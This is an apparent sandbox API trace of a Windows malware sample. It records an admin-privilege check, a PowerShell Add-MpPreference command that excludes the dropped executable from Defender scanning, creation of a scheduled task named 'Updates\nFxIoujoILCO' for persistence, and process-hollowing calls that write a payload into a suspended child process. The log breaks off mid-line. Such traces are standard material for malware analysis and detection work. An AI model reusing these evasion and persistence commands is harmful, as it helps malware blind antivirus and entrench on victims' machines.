[0142.122] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.122] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.122] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.123] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.124] CoTaskMemFree (pv=0x6aaba8)
[0142.124] CoTaskMemFree (pv=0x6d1130)
[0142.124] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.124] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.124] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.125] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.126] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.126] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.126] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.127] CoTaskMemFree (pv=0x6aaba8)
[0142.127] CoTaskMemFree (pv=0x6d1130)
[0142.127] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.128] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.128] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.129] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.129] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.129] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.130] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.130] CoTaskMemFree (pv=0x6aaba8)
[0142.130] CoTaskMemFree (pv=0x6d1130)
[0142.130] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.131] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.131] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.131] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", nBufferLength=0x105, lpBuffer=0x17dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", lpFilePart=0x0) returned 0x33
[0142.131] SetNamedSecurityInfoW () returned 0x0
[0142.260] GetCurrentProcess () returned 0xffffffff
[0142.260] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e038 | out: TokenHandle=0x17e038*=0x29c) returned 1
[0142.286] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17e030 | out: TokenInformation=0x0, ReturnLength=0x17e030) returned 0
[0142.287] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d1180
[0142.287] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x8, TokenInformation=0x6d1180, TokenInformationLength=0x4, ReturnLength=0x17e030 | out: TokenInformation=0x6d1180, ReturnLength=0x17e030) returned 1
[0142.287] LocalFree (hMem=0x6d1180) returned 0x0
[0142.288] DuplicateTokenEx (in: hExistingToken=0x29c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x17e038 | out: phNewToken=0x17e038*=0x2a0) returned 1
[0142.289] CheckTokenMembership (in: TokenHandle=0x2a0, SidToCheck=0x290af40*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x17e048 | out: IsMember=0x17e048) returned 1
[0142.289] CloseHandle (hObject=0x2a0) returned 1
[0142.620] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x6aa8a8
[0142.620] LocalAlloc (uFlags=0x0, uBytes=0xac) returned 0x6af800
[0142.623] ShellExecuteExW (in: pExecInfo=0x2914558*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Add-MpPreference -ExclusionPath \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2914558*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Add-MpPreference -ExclusionPath \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3b0)) returned 1
[0152.410] LocalFree (hMem=0x6aa8a8) returned 0x0
[0152.411] LocalFree (hMem=0x6af800) returned 0x0
[0152.416] GetCurrentProcess () returned 0xffffffff
[0152.416] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e0d8 | out: TokenHandle=0x17e0d8*=0x2a8) returned 1
[0152.427] GetCurrentProcess () returned 0xffffffff
[0152.427] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e0a8 | out: TokenHandle=0x17e0a8*=0x360) returned 1
[0152.429] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17e0dc | out: TokenInformation=0x0, ReturnLength=0x17e0dc) returned 0
[0152.429] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x6ed500
[0152.429] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x6ed500, TokenInformationLength=0x24, ReturnLength=0x17e0dc | out: TokenInformation=0x6ed500, ReturnLength=0x17e0dc) returned 1
[0152.430] LocalFree (hMem=0x6ed500) returned 0x0
[0152.432] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17e004, DesiredAccess=0x800, PolicyHandle=0x17dfc4 | out: PolicyHandle=0x17dfc4) returned 0x0
[0152.435] LsaLookupSids (in: PolicyHandle=0x6aa8a8, Count=0x1, Sids=0x2914848*=0x29147ec*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), ReferencedDomains=0x17dfe0, Names=0x17dfd4 | out: ReferencedDomains=0x17dfe0, Names=0x17dfd4) returned 0x0
[0152.439] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0152.439] LsaFreeMemory (Buffer=0x68f590) returned 0x0
[0152.439] LsaFreeMemory (Buffer=0x6ed500) returned 0x0
[0152.440] CloseHandle (hObject=0x360) returned 1
[0152.522] CoTaskMemAlloc (cb=0x20c) returned 0x6f0a48
[0152.522] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x6f0a48 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0152.523] CoTaskMemFree (pv=0x6f0a48)
[0152.523] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x17dbf4, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13
[0152.524] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x17dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26
[0152.525] CoTaskMemAlloc (cb=0x20c) returned 0x6f0a48
[0152.525] GetTempFileNameW (in: lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x6f0a48 | out: lpTempFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp")) returned 0xc690
[0152.532] CoTaskMemFree (pv=0x6f0a48)
[0152.583] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", nBufferLength=0x105, lpBuffer=0x17dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", lpFilePart=0x0) returned 0x31
[0152.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x17dfd0) returned 1
[0152.584] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2a4
[0152.584] GetFileType (hFile=0x2a4) returned 0x1
[0152.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x17dfcc) returned 1
[0152.584] GetFileType (hFile=0x2a4) returned 0x1
[0152.586] WriteFile (in: hFile=0x2a4, lpBuffer=0x2918db0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x17e05c, lpOverlapped=0x0 | out: lpBuffer=0x2918db0*, lpNumberOfBytesWritten=0x17e05c*=0x640, lpOverlapped=0x0) returned 1
[0152.588] CloseHandle (hObject=0x2a4) returned 1
[0152.607] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x6eded0
[0152.607] LocalAlloc (uFlags=0x0, uBytes=0xb8) returned 0x6f7a60
[0152.608] ShellExecuteExW (in: pExecInfo=0x291a654*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\nFxIoujoILCO\" /XML \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x291a654*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\nFxIoujoILCO\" /XML \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x36c)) returned 1
[0152.671] LocalFree (hMem=0x6eded0) returned 0x0
[0152.671] LocalFree (hMem=0x6f7a60) returned 0x0
[0153.151] GetCurrentProcess () returned 0xffffffff
[0153.151] GetCurrentProcess () returned 0xffffffff
[0153.151] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x17e0c0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x17e0c0*=0x360) returned 1
[0153.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x17e0b8*=0x360, lpdwindex=0x17dedc | out: lpdwindex=0x17dedc) returned 0x0
[0155.038] CloseHandle (hObject=0x360) returned 1
[0155.039] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", nBufferLength=0x105, lpBuffer=0x17dc18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", lpFilePart=0x0) returned 0x31
[0155.041] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp")) returned 1
[0156.275] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x36800, lpName=0x0) returned 0x360
[0156.275] memcpy (in: _Dst=0x4df0000, _Src=0x4421910, _Size=0x36800 | out: _Dst=0x4df0000) returned 0x4df0000
[0156.278] CloseHandle (hObject=0x360) returned 1
[0156.635] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x17db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0156.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x17d5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0156.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", cchWideChar=95, lpMultiByteStr=0x17ddc4, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpUsedDefaultChar=0x0) returned 95
[0156.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x17ddc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x14\x0f\x92", lpUsedDefaultChar=0x0) returned 0
[0156.808] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x17de84*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x17e198 | out: lpCommandLine="", lpProcessInformation=0x17e198*(hProcess=0x380, hThread=0x360, dwProcessId=0x830, dwThreadId=0x5c0)) returned 1
[0156.830] CoTaskMemFree (pv=0x0)
[0156.872] GetThreadContext (in: hThread=0x360, lpContext=0x296e688 | out: lpContext=0x296e688*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1434c4e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0156.873] ReadProcessMemory (in: hProcess=0x380, lpBaseAddress=0x7efde008, lpBuffer=0x17e188, nSize=0x4, lpNumberOfBytesRead=0x17e1cc | out: lpBuffer=0x17e188*, lpNumberOfBytesRead=0x17e1cc*=0x4) returned 1
[0156.873] VirtualAllocEx (hProcess=0x380, lpAddress=0x400000, dwSize=0x38000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0156.875] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x400000, lpBuffer=0x448ad50*, nSize=0x200, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x448ad50*, lpNumberOfBytesWritten=0x17e1cc*=0x200) returned 1
[0156.925] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x402000, lpBuffer=0x44bd970*, nSize=0x1c800, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x44bd970*, lpNumberOfBytesWritten=0x17e1cc*=0x1c800) returned 1
[0157.013] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x420000, lpBuffer=0x296f594*, nSize=0x200, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x296f594*, lpNumberOfBytesWritten=0x17e1cc*=0x200) returned 1
[0157.020] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x422000, lpBuffer=0x44da190*, nSize=0x16000, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x44da190*, lpNumberOfBytesWritten=0x17e1cc*=0x16000) returned 1
[0157.040] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x7efde008, lpBuffer=0x296faa0*, nSize=0x4, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x296faa0*, lpNumberOfBytesWritten=0x17e1cc*=0x4) returned 1
[0157.040] SetThreadContext (hThread=0x360, lpContext=0x296e688*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, 